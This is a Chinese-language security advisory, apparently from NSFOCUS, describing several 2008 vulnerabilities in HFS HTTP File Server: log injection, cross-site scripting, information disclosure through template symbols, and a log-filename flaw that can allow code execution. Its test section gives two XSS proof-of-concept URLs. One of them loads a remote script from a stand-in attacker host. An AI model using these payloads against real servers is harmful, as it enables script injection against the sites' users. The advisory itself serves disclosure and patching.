安全研究

安全漏洞
HFS HTTP File Server多个远程安全漏洞

发布日期:2008-01-23
更新日期:2008-01-25

受影响系统:
HFS HTTP File Server 1.5g - 2.3(Beta Build#174)
不受影响系统:
HFS HTTP File Server 2.2c
描述:
BUGTRAQ  ID: 27423
CVE(CAN) ID: CVE-2008-0405,CVE-2008-0406,CVE-2008-0407,CVE-2008-0408,CVE-2008-0409,CVE-2008-0410

HTTP File Server是用于共享文件的开源HTTP服务器。

HFS没有正确地记录某些输入,用户可以在登陆时伪造用户名将任意内容注入到日志文件中。

HFS没有正确地过滤某些输入便将其返回给了用户,这可能导致在受影响服务器的用户浏览器会话中执行任意HTML和脚本代码。

远程攻击者可以通过向服务器提交包含有模板符号的特制请求导致泄露某些信息,如连接数、传输速度、通讯统计或运行时间等。

HFS没有正确地处理用户名便使用用户名创建日志文件的文件名,这可能允许攻击者通过向服务器提交恶意请求导致创建目录、向文件附加数据,或触发缓冲区溢出。成功攻击允许执行任意代码,但要求使用了%user%模板符号定义日志文件的名称。

<*来源:Felipe Aragon (felipe@syhunt.com
        Alec Storm
  
  链接:http://secunia.com/advisories/28631/
        http://marc.info/?l=bugtraq&m=120111178931894&w=2
        http://marc.info/?l=bugtraq&m=120111147031194&w=2
        http://marc.info/?l=bugtraq&m=120111103330457&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://<script>alert('Syhunt%20XSS')<%2fscript>a:x@[host]/
http://<script>var%20sChar=String%2efromCharCode(58)%3bdocument%2ewrite('<script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom%2fxss%2ejs><%5c%2fscript>')%3b<%2fscript>a:x@[host]/

http://www.syhunt.com/advisories/hfshack.txt

建议:
厂商补丁:

HFS
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&big_mirror=0

浏览次数:3664
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障